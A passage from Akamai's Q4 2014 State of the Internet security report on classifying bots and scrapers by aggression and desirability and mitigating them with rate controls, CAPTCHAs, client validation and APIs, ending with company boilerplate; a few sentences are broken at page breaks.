In addition, the user-agent header can sometimes provide a unique and identifiable
user agent such as Googlebot, url-lib or curl and Whois can sometimes expose
bot owners.
5.3 / Mitigation / For each type of bot, there is a corresponding mitigation strategy,
5.3A / Undesired, Highly Aggressive / The most readily detectable bots are often
those with very high aggression and low desirability. Server log analysis may show
many hits to a page in a short amount of time, often crawling through lists of URLs.
Bots like these are usually easily detected and easily mitigated using a combination
of blacklists and rate controls; both capabilities are built into Akamais Kona Web
Application Firewall.
59
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
slightly different problem. These bots adversely impact operations, but they bring
a benefit to the organization. Therefore, it is impractical to block them fully. Rate
controls with a high threshold, or a user-prioritization application (UPA) product,
are a good way to minimize the impact of a bot. This permits the bot access to the
site until the number of requests reaches a set threshold, at which point the bot is
blocked or sent to a waiting room. In the meantime, legitimate users are able to
access the site normally.
5.3C / Low Desirability, Low Aggression / Bots that attempt to evade controls
and disguise themselves as normal traffic are a challenge to mitigate. In many cases,
these bots are watched closely by their owners, and their behavior may be modified
on the fly to adapt to new defenses. This class of bots, with low aggression and low
desirability, are probably the most difficult to mitigate. The best response Akamai
60
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
has developed is to employ client validation on sensitive pages. Java checkers and
CAPTCHAs can slow the bot and force the controllers to add more code to try to
pass the validation scheme.
While it is almost impossible and usually undesirable to defend an entire site from
bots of this type, placing countermeasures around sensitive pages, such as search
and login pages, can curtail bot activity. In many cases, organizations combine
validation with rate controls, and only use the validation scheme with suspicious IP
addresses that have crossed set thresholds.
Be aware that dedicated bot-herders will adapt to most client validation methods
eventually. The goal is to reduce the efficiency of the bot and make it too costly for
the bot-herder to continue to operate against the organizations website.
5.3D / Highly Desired, Low Aggression / Finally, there is the case of bots that are
desired and are not overly aggressive. While its possible to ignore this class of bots,
there are ways to further reduce their impact on a website. In many cases, these
bots are looking for information and dont have another method of collecting it.
Offering an API or a dedicated data feed can move the load off the website and free
up resources for users, while providing other organizations the information they
need in a more digestible form. This approach will not work in all situations web
spiders will always request a web page, for example, but if business partners are
looking for rate or location information, providing a better way to request the data
can be a viable option.
5.4 / Conclusion / Moving forward, bots and scrapers will continue to be a problem
of scrapers will increase as developers create small mobile apps that aggregate
data for the convenience of their users. Development of a strategy to contain and
mitigate the effects of undesirable bots should be a part of the operations plan of
every website.
Whether using a defensive framework such as the one presented here, or another
method, its important for each organization to evaluate which bots it will allow to
access its site. A set of bots that are highly desirable for one organization may appear
malicious to another, and the criteria can change over time. As an organization
expands into new markets, a previously unwanted bot may become the key to
sharing information. Frequent analysis and modification of security policies is key
to mitigating the risks posed by bots and scrapers.
62
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
[ SECTION ] 6
LOOKING FORWARD
63
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
64
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Akamai is a leading provider of cloud services for delivering, optimizing and securing online content and business applications. At the core of the companys solutions is the Akamai Intelligent
Platform providing extensive reach, coupled with unmatched reliability, security, visibility and expertise. Akamai removes the complexities of connecting the increasingly mobile world,
supporting 24/7 consumer demand, and enabling enterprises to securely leverage the cloud. To learn more about how Akamai is accelerating the pace of innovation in a hyperconnected
world, please visit www.akamai.com or blogs.akamai.com, and follow @Akamai on Twitter.
Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 40 offices around the world. Our services and renowned customer care
enable businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are listed on
www.akamai.com/locations.
2015 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the Akamai
wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication is accurate as of its
publication date; such information is subject to change without notice. Published 01/15.